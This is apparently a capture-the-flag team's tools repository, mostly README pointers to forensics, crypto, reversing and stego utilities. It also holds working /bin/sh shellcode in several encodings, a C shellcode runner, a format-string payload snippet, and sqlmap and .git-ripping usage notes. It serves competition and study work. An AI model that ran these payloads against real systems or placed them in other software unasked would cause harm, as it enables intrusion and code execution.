├── .gitignore ├── PE tools ├── Ollydbg │ └── README.md ├── PEID │ ├── PEiD-0.95.zip │ └── README.md └── README.md ├── README.md ├── automatic-vagrant-box ├── README.md ├── Vagrantfile └── et_setup.sh ├── cipher ├── README.md └── SCBSolvr.zip ├── debugging └── README.md ├── file-carving ├── 010editor │ └── lookhere ├── README.md ├── binwalk │ └── README.md └── foremost │ └── README.md ├── forensics ├── README.md ├── detectiteasy │ └── lookhere ├── extundelete │ └── README.md ├── rabin2 │ └── use_rabin2_-zz └── radare │ └── lookhere ├── format-string-vuln └── Readme.md ├── fuzzing └── README.md ├── git ├── README.md └── rip-git │ └── README.md ├── hash ├── README.md └── hash-length-extension │ ├── README.md │ ├── hash_extender │ └── README.md │ └── hashpump │ └── README.md ├── password-dictionary └── EN - rockyou.txt.bz2 ├── pcap ├── README.md ├── pcapfix │ └── README.md ├── tcpxtract │ └── todo └── xplico │ └── README.todo ├── port-knocking ├── README.md └── knock │ └── README.md ├── reversing ├── README.md ├── dex to jar convertor │ ├── README.md │ └── dex2jar-0.0.9.15.zip ├── dex to java decompiler │ └── README.md └── reversing jar │ ├── README.md │ └── jd-gui-0.3.5.linux.i686.tar.gz ├── scripting └── expect ├── shell ├── README.md └── shell.py ├── shellcoding ├── check-security-measures ├── remote ├── runner.c └── shellcodes │ ├── binsh │ ├── binsh-alpha-mixed │ ├── binsh-alpha-upper │ └── binsh-shikata-ga-nai ├── sql-injection ├── README.md └── sqlmap │ ├── README.md │ └── sqlmapproject-sqlmap-97cc679.tar.gz ├── stego ├── README.md ├── soundvis │ └── SoundVisualizer ├── steganabara │ ├── README.md │ └── steganabara-1.1.1.jar ├── steghide │ └── README.md └── stegsolve │ ├── README.md │ └── Stegsolve.jar ├── template └── README.md └── xss └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Created by https://www.gitignore.io/api/linux 3 | 4 | ### Linux ### 5 | *~ 6 | 7 | # KDE directory preferences 8 | .directory 9 | 10 | # Linux trash folder which might appear on any partition or disk 11 | .Trash-* 12 | 13 | 14 | -------------------------------------------------------------------------------- /PE tools/Ollydbg/README.md: -------------------------------------------------------------------------------- 1 | OLLYDBG 2 | ======= 3 | 4 | [OllyDbg](http://www.ollydbg.de/) is a 32-bit assembler level analysing debugger for Microsoft Windows. 5 | 6 | 7 | -------------------------------------------------------------------------------- /PE tools/PEID/PEiD-0.95.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/PE tools/PEID/PEiD-0.95.zip -------------------------------------------------------------------------------- /PE tools/PEID/README.md: -------------------------------------------------------------------------------- 1 | PEiD 2 | ==== 3 | 4 | Probably the most useful tool is [PEiD](PEiD-0.95.zip) which detects most common packers, cryptors and compilers for PE files. 5 | -------------------------------------------------------------------------------- /PE tools/README.md: -------------------------------------------------------------------------------- 1 | PETOOLS 2 | ======= 3 | 4 | Herin lies the tools for the analysis of PE file format. 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Team Colonel Panic Tools 2 | ======================== 3 | 4 | Herein lie the tools that Team Colonel Panic uses/should be using frequently (but don't come pre-installed). 5 | 6 | Another cool repo to look into is by zardus at [zardus/ctf-tools](https://github.com/zardus/ctf-tools/). It also includes installers for all tools and is actually quite awesome. -------------------------------------------------------------------------------- /automatic-vagrant-box/README.md: -------------------------------------------------------------------------------- 1 | EpicTreasure - Batteries included CTF Vagrant box 2 | ================================================= 3 | 4 | Taken from [here](https://github.com/thebarbershopper/epictreasure). 5 | 6 | Vagrant file and et_setup.sh copied on 14 Dec 2015. 7 | 8 | Tools included 9 | -------------- 10 | 11 | + Binjitsu 12 | + Pwndbg 13 | + Radare2 14 | + Firmware tools (fmk / qemu) 15 | + Angr 16 | -------------------------------------------------------------------------------- /automatic-vagrant-box/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | Vagrant.configure("2") do |config| 5 | config.vm.box = "trusty64" 6 | config.vm.box_url = "http://cloud-images.ubuntu.com/vagrant/trusty/current/trusty-server-cloudimg-amd64-vagrant-disk1.box" 7 | config.vm.provision :shell, :path => "et_setup.sh", :privileged => false 8 | config.ssh.username = 'vagrant' 9 | config.ssh.forward_agent = true 10 | 11 | config.vm.synced_folder "host-share", "/home/vagrant/host-share" 12 | 13 | config.vm.provider "virtualbox" do |vb| 14 | vb.customize ["modifyvm", :id, "--memory", "2048"] 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /automatic-vagrant-box/et_setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Updates 4 | sudo apt-get -y update 5 | sudo apt-get -y upgrade 6 | 7 | sudo apt-get -y install python3-pip 8 | sudo apt-get -y install tmux 9 | sudo apt-get -y install gdb gdb-multiarch 10 | sudo apt-get -y install unzip 11 | sudo apt-get -y install foremost 12 | sudo apt-get -y install ipython 13 | 14 | # QEMU with MIPS/ARM - http://reverseengineering.stackexchange.com/questions/8829/cross-debugging-for-mips-elf-with-qemu-toolchain 15 | sudo apt-get -y install qemu qemu-user qemu-user-static 16 | sudo apt-get -y install 'binfmt*' 17 | sudo apt-get -y install libc6-armhf-armel-cross 18 | sudo apt-get -y install debian-keyring 19 | sudo apt-get -y install debian-archive-keyring 20 | sudo apt-get -y install emdebian-archive-keyring 21 | tee /etc/apt/sources.list.d/emdebian.list << EOF 22 | deb http://mirrors.mit.edu/debian squeeze main 23 | deb http://www.emdebian.org/debian squeeze main 24 | EOF 25 | sudo apt-get -y install libc6-mipsel-cross 26 | sudo apt-get -y install libc6-arm-cross 27 | mkdir /etc/qemu-binfmt 28 | ln -s /usr/mipsel-linux-gnu /etc/qemu-binfmt/mipsel 29 | ln -s /usr/arm-linux-gnueabihf /etc/qemu-binfmt/arm 30 | rm /etc/apt/sources.list.d/emdebian.list 31 | sudo apt-get update 32 | 33 | # Install Binjitsu 34 | sudo apt-get -y install python2.7 python-pip python-dev git 35 | sudo pip install --upgrade git+https://github.com/binjitsu/binjitsu.git 36 | 37 | cd 38 | mkdir tools 39 | cd tools 40 | 41 | # Install pwndbg 42 | git clone https://github.com/zachriggle/pwndbg 43 | echo source `pwd`/pwndbg/gdbinit.py >> ~/.gdbinit 44 | 45 | # Capstone for pwndbg 46 | git clone https://github.com/aquynh/capstone 47 | cd capstone 48 | git checkout -t origin/next 49 | sudo ./make.sh install 50 | cd bindings/python 51 | sudo python3 setup.py install # Ubuntu 14.04+, GDB uses Python3 52 | 53 | # pycparser for pwndbg 54 | sudo pip3 install pycparser # Use pip3 for Python3 55 | 56 | # Install radare2 57 | git clone https://github.com/radare/radare2 58 | cd radare2 59 | ./sys/install.sh 60 | 61 | # Install binwalk 62 | cd 63 | git clone https://github.com/devttys0/binwalk 64 | cd binwalk 65 | sudo python setup.py install 66 | 67 | # Install Firmware-Mod-Kit 68 | sudo apt-get -y install git build-essential zlib1g-dev liblzma-dev python-magic 69 | cd ~/tools 70 | wget https://firmware-mod-kit.googlecode.com/files/fmk_099.tar.gz 71 | tar xvf fmk_099.tar.gz 72 | rm fmk_099.tar.gz 73 | cd fmk_099/src 74 | ./configure 75 | make 76 | 77 | # Uninstall capstone 78 | sudo pip2 uninstall capstone -y 79 | 80 | # Install correct capstone 81 | cd ~/tools/capstone/bindings/python 82 | sudo python setup.py install 83 | 84 | # Personal config 85 | sudo sudo apt-get -y install stow 86 | cd /home/vagrant 87 | rm .bashrc 88 | git clone https://github.com/thebarbershopper/dotfiles 89 | cd dotfiles 90 | ./install.sh 91 | 92 | # Install Angr 93 | cd /home/vagrant 94 | sudo apt-get -y install python-dev libffi-dev build-essential virtualenvwrapper 95 | sudo pip install virtualenv 96 | virtualenv angr 97 | source angr/bin/activate 98 | pip install angr --upgrade 99 | 100 | # Install 32 bit libs 101 | sudo dpkg --add-architecture i386 102 | sudo apt-get update 103 | sudo apt-get -y install libc6:i386 libncurses5:i386 libstdc++6:i386 104 | -------------------------------------------------------------------------------- /cipher/README.md: -------------------------------------------------------------------------------- 1 | Cipher Tools 2 | ============ 3 | 4 | Herein lie the tools that can be used whenever ciphers are involved. 5 | 6 | Tools in this repo 7 | ------------------ 8 | 9 | + [SCBSolvr](SCBSolvr.zip) for breaking monoalphabetic substitution ciphers 10 | 11 | Other links 12 | ----------- 13 | 14 | + [YASME-Tim Crypto Tools](https://github.com/YASME-Tim/crypto-tools) contains 15 | + [Finding coding/hashing scheme](https://github.com/YASME-Tim/crypto-tools/tree/master/find-coding-scheme) 16 | + [One Time Pad](https://github.com/YASME-Tim/crypto-tools/tree/master/otp) 17 | + [Poem Code Cipher](https://github.com/YASME-Tim/crypto-tools/tree/master/poemcode) 18 | + [Caesar Cipher Bruteforce](https://github.com/YASME-Tim/crypto-tools/tree/master/rot) 19 | + [Phone Keypad - HandyCode](https://github.com/YASME-Tim/crypto-tools/tree/master/handycode) 20 | + [CRYPTOOL](https://www.cryptool.org/en/) 21 | + [Rumkin Cipher Tools](http://rumkin.com/tools/cipher/) 22 | + [CryptoCrack](https://sites.google.com/site/cryptocrackprogram/) 23 | + [quipqiup](http://www.quipqiup.com/) - A fast and automated cryptogram solver. Has 2 modes (trusting spaces, and finding spaces). 24 | + [f00l Vigenere Cracker](http://f00l.de/hacking/vigenere.php) - Helps crack vigenere. Not very customizable, however. 25 | + `zbar-tools` for decoding barcodes and qr codes (installed using `apt-get`) 26 | + [yafu](http://sourceforge.net/projects/yafu/) - Automated integer factorization 27 | + [rsa-tool](https://github.com/ius/rsatool) - rsatool can be used to calculate RSA and RSA-CRT parameters 28 | -------------------------------------------------------------------------------- /cipher/SCBSolvr.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/cipher/SCBSolvr.zip -------------------------------------------------------------------------------- /debugging/README.md: -------------------------------------------------------------------------------- 1 | Debugging 2 | ========= 3 | 4 | It is quite painful to have differing values of addresses when debugging and when outside. To fix this, there is [fixenv by hellman](https://github.com/hellman/fixenv). 5 | 6 | Visualize heap operations with [villoc](https://github.com/wapiflapi/villoc). 7 | 8 | Debug nicely using [PEDA](https://github.com/longld/peda) or [pwndbg](https://github.com/zachriggle/pwndbg). 9 | -------------------------------------------------------------------------------- /file-carving/010editor/lookhere: -------------------------------------------------------------------------------- 1 | http://www.sweetscape.com/010editor/ 2 | -------------------------------------------------------------------------------- /file-carving/README.md: -------------------------------------------------------------------------------- 1 | File Carving Tools 2 | ================== 3 | 4 | Herein lie the tools that can be used to carv out the specific format data out of a given file. -------------------------------------------------------------------------------- /file-carving/binwalk/README.md: -------------------------------------------------------------------------------- 1 | binwalk 2 | ======= 3 | 4 | [binwalk](https://github.com/devttys0/binwalk) can be used for analyzing, reverse engineering, and extracting firmware ,images 5 | 6 | ``` 7 | binwalk --options inputfilename 8 | ``` 9 | 10 | Note: Installable using `apt-get` 11 | 12 | Reference usage 13 | --------------- 14 | 15 | [DEFKTHON CTF:Reversing](https://github.com/ctfs/write-ups-2014/blob/master/defkthon-ctf/reversing-400/README.md) -------------------------------------------------------------------------------- /file-carving/foremost/README.md: -------------------------------------------------------------------------------- 1 | foremost 2 | ======= 3 | 4 | [foremost](https://github.com/jonstewart/foremost) can be used to Recover files using their headers, footers, and data structures. 5 | 6 | ``` 7 | foremost --options -i inputfilename -o outputdir 8 | ``` 9 | 10 | Note: Installable using `apt-get` 11 | 12 | Reference usage 13 | --------------- 14 | 15 | [DEFCON-CTF-QUALS-FORENSIC](http://jekil.sexy/forensic/defcon-18-ctf-quals-forensic-100-writeup) -------------------------------------------------------------------------------- /forensics/README.md: -------------------------------------------------------------------------------- 1 | FORENSIC TOOLS 2 | ============== 3 | 4 | Herein lie the tools that can be used to do forensic analysis. -------------------------------------------------------------------------------- /forensics/detectiteasy/lookhere: -------------------------------------------------------------------------------- 1 | http://ntinfo.biz/ 2 | -------------------------------------------------------------------------------- /forensics/extundelete/README.md: -------------------------------------------------------------------------------- 1 | EXTUNDELETE 2 | =========== 3 | 4 | [Extundelete](http://extundelete.sourceforge.net/) is a utility that can recover deleted files from an ext3 or ext4 partition.. 5 | 6 | ``` 7 | example usage: 8 | extundelete [options] device-file 9 | ``` 10 | Note: directly installable from your package manager. 11 | 12 | Reference usage 13 | --------------- 14 | 15 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /forensics/rabin2/use_rabin2_-zz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/forensics/rabin2/use_rabin2_-zz -------------------------------------------------------------------------------- /forensics/radare/lookhere: -------------------------------------------------------------------------------- 1 | http://reverseengineering.stackexchange.com/questions/5926/what-linux-software-can-i-use-to-explore-entropy-of-a-file 2 | -------------------------------------------------------------------------------- /format-string-vuln/Readme.md: -------------------------------------------------------------------------------- 1 | Format String Vuln 2 | ================== 3 | 4 | Probably the easiest to use tool turns out to be [libformatstr](https://github.com/hellman/libformatstr) 5 | 6 | Install using `sudo pip install libformatstr`. 7 | 8 | Most common usage: 9 | 10 | ```python 11 | from libformatstr import FormatStr 12 | 13 | addr = 0xdeadbeef 14 | system_addr = 0xcafebabe 15 | 16 | p = FormatStr() 17 | p[addr] = system_addr 18 | 19 | # buf is 14th argument, 4 bytes are already printed 20 | print repr( p.payload(14, start_len=4) ) 21 | ``` 22 | -------------------------------------------------------------------------------- /fuzzing/README.md: -------------------------------------------------------------------------------- 1 | Fuzzing 2 | ------- 3 | 4 | Really worth trying out the tool [AFL](http://lcamtuf.coredump.cx/afl/). Simple easy to fuzz stuff. `./afl-gcc` to compile, `./afl-fuzz` to fuzz, and `./afl-tmin` to simplify crashing test cases to simply understand things more easily. 5 | -------------------------------------------------------------------------------- /git/README.md: -------------------------------------------------------------------------------- 1 | Git Tools 2 | ========= 3 | 4 | Herein lie the tools that can be used whenever git repositories are related. -------------------------------------------------------------------------------- /git/rip-git/README.md: -------------------------------------------------------------------------------- 1 | rip-git 2 | ======= 3 | 4 | [rip-git](https://github.com/kost/dvcs-ripper/blob/master/rip-git.pl) can be used similar to the following to get a git repo from a .git folder online. 5 | 6 | ``` 7 | perl ./rip-git.pl -v -u http://www.example.com/.git/ 8 | ``` 9 | 10 | Reference usage 11 | --------------- 12 | 13 | [9447 CTF 2014 / Tumorous](https://github.com/ctfs/write-ups-2014/tree/master/9447-ctf-2014/tumorous) 14 | -------------------------------------------------------------------------------- /hash/README.md: -------------------------------------------------------------------------------- 1 | Hash Tools 2 | ========== 3 | 4 | Herein lie the tools that can be used whenever hashes are involved. -------------------------------------------------------------------------------- /hash/hash-length-extension/README.md: -------------------------------------------------------------------------------- 1 | Hash Length Extension 2 | --------------------- 3 | 4 | Hash length extension attacks are a type of attack when certain types of hashes are misused as message authentication codes, allowing for inclusion of extra information. 5 | 6 | Read more on [Wikipedia](https://en.wikipedia.org/wiki/Length_extension_attack) -------------------------------------------------------------------------------- /hash/hash-length-extension/hash_extender/README.md: -------------------------------------------------------------------------------- 1 | Hash Extender 2 | ============= 3 | 4 | [hash_extender](https://github.com/iagox86/hash_extender) can be used to exploit the hash length extension attack in various hashing algorithms. 5 | 6 | Reference usage 7 | --------------- 8 | 9 | [Skull Security Blog Post](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) which basically is the same as the GitHub readme for this tool, but in a more nicely viewable format -------------------------------------------------------------------------------- /hash/hash-length-extension/hashpump/README.md: -------------------------------------------------------------------------------- 1 | HashPump 2 | ======== 3 | 4 | [hashpump](https://github.com/bwall/HashPump) can be used to exploit the hash length extension attack in various hashing algorithms. 5 | 6 | Reference usage 7 | --------------- 8 | 9 | [Plaid CTF 2014 / mtpox](https://github.com/ctfs/write-ups-2014/tree/master/plaid-ctf-2014/mtpox) 10 | 11 | PS: It might be better to use [hash_extender](https://github.com/TeamColonelPanic/tools/tree/master/hash/hash-length-extension/hash_extender) instead when you want the output in HTML format, for example. 12 | -------------------------------------------------------------------------------- /password-dictionary/EN - rockyou.txt.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/password-dictionary/EN - rockyou.txt.bz2 -------------------------------------------------------------------------------- /pcap/README.md: -------------------------------------------------------------------------------- 1 | Pcap Tools 2 | ========== 3 | 4 | Herein lie the tools that can be used whenever pcap files are related. -------------------------------------------------------------------------------- /pcap/pcapfix/README.md: -------------------------------------------------------------------------------- 1 | pcapfix 2 | ======= 3 | 4 | [pcapfix](https://github.com/Rup0rt/pcapfix) can be used to fix a broken pcap file in order that it can then be opened in wireshark. 5 | 6 | ``` 7 | pcapfix --outfile outputfilename --verbose inputfilename 8 | ``` 9 | 10 | Note: Installable using `apt-get` 11 | 12 | Reference usage 13 | --------------- 14 | 15 | [ASIS CTF 2014 Quals / Forensic](https://github.com/ctfs/write-ups-2014/tree/master/asis-ctf-quals-2014/forensic) -------------------------------------------------------------------------------- /pcap/tcpxtract/todo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/pcap/tcpxtract/todo -------------------------------------------------------------------------------- /pcap/xplico/README.todo: -------------------------------------------------------------------------------- 1 | http://www.xplico.org/download 2 | -------------------------------------------------------------------------------- /port-knocking/README.md: -------------------------------------------------------------------------------- 1 | Port Knocking Tools 2 | =================== 3 | 4 | Herein lie the tools that can be used whenever port knocking is required. 5 | -------------------------------------------------------------------------------- /port-knocking/knock/README.md: -------------------------------------------------------------------------------- 1 | knock 2 | ===== 3 | 4 | [knock](http://www.zeroflux.org/projects/knock) can be used to do port knocking. Read the reference write-up to understand more. 5 | 6 | Reference usage 7 | --------------- 8 | 9 | [ASIS CTF 2014 Quals / Toq-Toq](https://github.com/ctfs/write-ups-2014/tree/master/asis-ctf-quals-2014/toq-toq) -------------------------------------------------------------------------------- /reversing/README.md: -------------------------------------------------------------------------------- 1 | Reversing Tools 2 | =============== 3 | 4 | Herein lie the tools that can be used whenever reverse engineering is needed. -------------------------------------------------------------------------------- /reversing/dex to jar convertor/README.md: -------------------------------------------------------------------------------- 1 | DEX to JAR convertor 2 | ======== 3 | 4 | [DEX to JAR Convertor](dex2jar-0.0.9.15.zip) can be used to work with android .dex and java .class files. 5 | 6 | ``` 7 | Usage: run dextojar.sh file. 8 | ``` 9 | NOTE: can also be downloaded at [https://code.google.com/p/dex2jar/](https://code.google.com/p/dex2jar/) 10 | 11 | Reference usage 12 | --------------- 13 | 14 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /reversing/dex to jar convertor/dex2jar-0.0.9.15.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/reversing/dex to jar convertor/dex2jar-0.0.9.15.zip -------------------------------------------------------------------------------- /reversing/dex to java decompiler/README.md: -------------------------------------------------------------------------------- 1 | DEX to JAR Decompiler 2 | ===================== 3 | 4 | [DEX to JAR Decompiler](https://github.com/skylot/jadx) can be used to produce Java source code from Android Dex and Apk files. 5 | 6 | It is a command line and a GUI tool. 7 | 8 | ``` 9 | TODO 10 | ``` 11 | 12 | Reference usage 13 | --------------- 14 | 15 | [Pragyan CTF 2015 / Hackerz](https://github.com/ctfs/write-ups-2015/tree/master/pragyan-ctf-2015/android/hackerz) -------------------------------------------------------------------------------- /reversing/reversing jar/README.md: -------------------------------------------------------------------------------- 1 | Java Decompiler 2 | =============== 3 | 4 | [Java Decompiler](jd-gui-0.3.5.linux.i686.tar.gz) can be used to decompile .jar file with in a user friendly gui. 5 | 6 | Note: Recent and Updated version can also be downloaded at [http://jd.benow.ca/](http://jd.benow.ca/) 7 | 8 | Reference usage 9 | --------------- 10 | 11 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /reversing/reversing jar/jd-gui-0.3.5.linux.i686.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/reversing/reversing jar/jd-gui-0.3.5.linux.i686.tar.gz -------------------------------------------------------------------------------- /scripting/expect: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/scripting/expect -------------------------------------------------------------------------------- /shell/README.md: -------------------------------------------------------------------------------- 1 | Interactive Shell 2 | ================= 3 | 4 | Sometimes, you need to just escape some strings and use them in a shell. Manually escaping them is a pain, so it turns out to be better to use a direct shell escaping script. 5 | 6 | Usage 7 | ----- 8 | 9 | Run python in a directory that has `shell.py` in it and run the following commands 10 | 11 | ``` 12 | import shell 13 | while True: 14 | print "Input string >>>", 15 | x = raw_input() 16 | print " ", shell.quote(x) 17 | print "" 18 | 19 | ``` 20 | 21 | Then, any string you give as input is quoted nicely and returned to you. 22 | -------------------------------------------------------------------------------- /shell/shell.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | ###################################################################### 3 | # Written by Kevin L. Sitze on 2006-12-03 4 | # This code may be used pursuant to the MIT License. 5 | ###################################################################### 6 | 7 | import re 8 | 9 | __all__ = ( 'quote', ) 10 | 11 | _bash_reserved_words = { 12 | 'case' : True, 13 | 'coproc' : True, 14 | 'do' : True, 15 | 'done' : True, 16 | 'elif' : True, 17 | 'else' : True, 18 | 'esac' : True, 19 | 'fi' : True, 20 | 'for' : True, 21 | 'function' : True, 22 | 'if' : True, 23 | 'in' : True, 24 | 'select' : True, 25 | 'then' : True, 26 | 'until' : True, 27 | 'while' : True, 28 | 'time' : True 29 | } 30 | 31 | #### 32 | # _quote_re1 escapes double-quoted special characters. 33 | # _quote_re2 escapes unquoted special characters. 34 | 35 | _quote_re1 = re.compile( r"([\!\"\$\\\`])" ) 36 | _quote_re2 = re.compile( r"([\t\ \!\"\#\$\&\'\(\)\*\:\;\<\>\?\@\[\\\]\^\`\{\|\}\~])" ) 37 | 38 | def quote( *args ): 39 | """Combine the arguments into a single string and escape any and 40 | all shell special characters or (reserved) words. The shortest 41 | possible string (correctly quoted suited to pass to a bash shell) 42 | is returned. 43 | """ 44 | s = "".join( args ) 45 | if _bash_reserved_words.has_key( s ): 46 | return "\\" + s 47 | elif s.find( '\'' ) >= 0: 48 | s1 = '"' + _quote_re1.sub( r"\\\1", s ) + '"' 49 | else: 50 | s1 = "'" + s + "'" 51 | s2 = _quote_re2.sub( r"\\\1", s ) 52 | if len( s1 ) <= len( s2 ): 53 | return s1 54 | else: 55 | return s2 56 | 57 | if __name__ == '__main__': 58 | 59 | import sys 60 | import traceback 61 | from types import FloatType, ComplexType 62 | 63 | def assertEquals( exp, got ): 64 | """assertEquals( exp, got ) 65 | 66 | Two objects test as "equal" if: 67 | 68 | * they are the same object as tested by the 'is' operator. 69 | * either object is a float or complex number and the absolute 70 | value of the difference between the two is less than 1e-8. 71 | * applying the equals operator ('==') returns True. 72 | """ 73 | if exp is got: 74 | r = True 75 | elif ( type( exp ) in ( FloatType, ComplexType ) or 76 | type( got ) in ( FloatType, ComplexType ) ): 77 | r = abs( exp - got ) < 1e-8 78 | else: 79 | r = ( exp == got ) 80 | if not r: 81 | print >>sys.stderr, "Error: expected <%s> but got <%s>" % ( repr( exp ), repr( got ) ) 82 | traceback.print_stack() 83 | 84 | for word in _bash_reserved_words: 85 | assertEquals( "\\" + word, quote( word ) ) 86 | 87 | for char in ( '\t', 88 | ' ', '!', '"', '#', 89 | '$', '&', "'", '(', 90 | ')', '*', ':', ';', 91 | '<', '>', '?', '@', 92 | '[', ']', '^', '`', 93 | '{', '|', '}', '~' ): 94 | assertEquals( "\\" + char, quote( char ) ) 95 | 96 | assertEquals( "'this is a simple path with spaces'", 97 | quote( 'this is a simple path with spaces' ) ) 98 | assertEquals( "don\\'t", quote( "don't" ) ) 99 | assertEquals( '"don\'t do it"', quote( "don't do it" ) ) 100 | 101 | -------------------------------------------------------------------------------- /shellcoding/check-security-measures: -------------------------------------------------------------------------------- 1 | https://github.com/slimm609/checksec.sh 2 | -------------------------------------------------------------------------------- /shellcoding/remote: -------------------------------------------------------------------------------- 1 | pwntools / binjitsu =====> Read http://capturetheswag.blogspot.com.au/2015/03/vancouver-bsides-2015-sushi-pwnable.html 2 | -------------------------------------------------------------------------------- /shellcoding/runner.c: -------------------------------------------------------------------------------- 1 | unsigned char code[] = "/*Shellcode here*/"; 2 | 3 | int main(int argc, char **argv) 4 | { 5 | int (*func)(); 6 | func = (int (*)()) code; 7 | (int)(*func)(); 8 | } 9 | -------------------------------------------------------------------------------- /shellcoding/shellcodes/binsh: -------------------------------------------------------------------------------- 1 | buf = '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80' 2 | -------------------------------------------------------------------------------- /shellcoding/shellcodes/binsh-alpha-mixed: -------------------------------------------------------------------------------- 1 | buf = "" 2 | buf += "\x89\xe7\xdb\xc7\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 3 | buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 4 | buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 5 | buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 6 | buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x75\x61\x7a\x69\x79" 7 | buf += "\x67\x49\x71\x4c\x70\x46\x6b\x72\x71\x31\x78\x46\x4f" 8 | buf += "\x54\x6f\x52\x53\x71\x78\x32\x48\x64\x6f\x63\x52\x63" 9 | buf += "\x59\x50\x6e\x4f\x79\x7a\x43\x6a\x6d\x6b\x30\x41\x41" 10 | -------------------------------------------------------------------------------- /shellcoding/shellcodes/binsh-alpha-upper: -------------------------------------------------------------------------------- 1 | # 111 bytes 2 | buf = "" 3 | buf += "\x89\xe3\xdb\xc0\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49" 4 | buf += "\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33" 5 | buf += "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41" 6 | buf += "\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41" 7 | buf += "\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a" 8 | buf += "\x4a\x49\x50\x31\x38\x49\x4a\x57\x4b\x51\x48\x30\x34" 9 | buf += "\x4b\x56\x31\x33\x58\x56\x4f\x36\x4f\x43\x43\x43\x58" 10 | buf += "\x53\x58\x46\x4f\x42\x42\x45\x39\x32\x4e\x4d\x59\x4b" 11 | buf += "\x53\x58\x4d\x4b\x30\x41\x41" 12 | -------------------------------------------------------------------------------- /shellcoding/shellcodes/binsh-shikata-ga-nai: -------------------------------------------------------------------------------- 1 | #48 2 | shellcode = "" 3 | shellcode += "\xdb\xcd\xb8\x52\x3f\x12\x65\xd9\x74\x24\xf4\x5a\x2b" 4 | shellcode += "\xc9\xb1\x06\x31\x42\x18\x03\x42\x18\x83\xc2\x56\xdd" 5 | shellcode += "\xe7\x54\x9f\xd6\xe9\x27\x14\x48\x82\x68\x05\x19\x3a" 6 | shellcode += "\x1f\x76\xbf\xd3\xb1\x01\xdc\xe9\xce" 7 | 8 | #48 9 | shellcode = "" 10 | shellcode += "\xda\xdd\xbf\x84\xc0\xdc\xb4\xd9\x74\x24\xf4\x5e\x2b" 11 | shellcode += "\xc9\xb1\x06\x31\x7e\x18\x03\x7e\x18\x83\xee\x78\x22" 12 | shellcode += "\x29\x85\x49\x54\x33\x56\x42\xca\xdc\xb8\x7b\x9f\x74" 13 | shellcode += "\xaf\xac\x3d\xec\x41\x3b\x22\x23\x1d" 14 | 15 | #48 16 | shellcode = "" 17 | shellcode += "\xda\xce\xd9\x74\x24\xf4\x5a\xbd\xbb\x28\xcb\xf5\x2b" 18 | shellcode += "\xc9\xb1\x06\x83\xc2\x04\x31\x6a\x14\x03\x6a\xaf\xca" 19 | shellcode += "\x3e\xc4\x06\xfd\x20\x97\x93\x53\xcb\xf7\x8c\x20\x63" 20 | shellcode += "\x60\xfd\xa4\x1a\x1e\x88\xca\x10\x5e" 21 | 22 | #48 23 | shellcode = "" 24 | shellcode += "\xbd\x49\x9d\x19\x81\xdd\xc5\xd9\x74\x24\xf4\x5e\x29" 25 | shellcode += "\xc9\xb1\x06\x83\xee\xfc\x31\x6e\x0f\x03\x6e\x46\x7f" 26 | shellcode += "\xec\xb0\x91\x88\xee\x03\x2a\x26\x99\x4c\x03\xbb\x31" 27 | shellcode += "\xfb\x74\x59\xab\x95\x03\x7e\xe6\xea" 28 | 29 | -------------------------------------------------------------------------------- /sql-injection/README.md: -------------------------------------------------------------------------------- 1 | SQL-Injection Tools 2 | =================== 3 | 4 | Herein lie the tools that can be used whenever there is a possibility of sql-injection. 5 | -------------------------------------------------------------------------------- /sql-injection/sqlmap/README.md: -------------------------------------------------------------------------------- 1 | Sqlmap 2 | ======== 3 | 4 | [Sqlmap](https://github.com/sqlmapproject/sqlmap) can be used to perform sql-injection when you are not in the mood of writing long queries. 5 | 6 | ``` 7 | 8 | ./sqlmap.py -h 9 | ``` 10 | To see operations available. 11 | 12 | Reference usage 13 | --------------- 14 | 15 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /sql-injection/sqlmap/sqlmapproject-sqlmap-97cc679.tar.gz: -------------------------------------------------------------------------------- 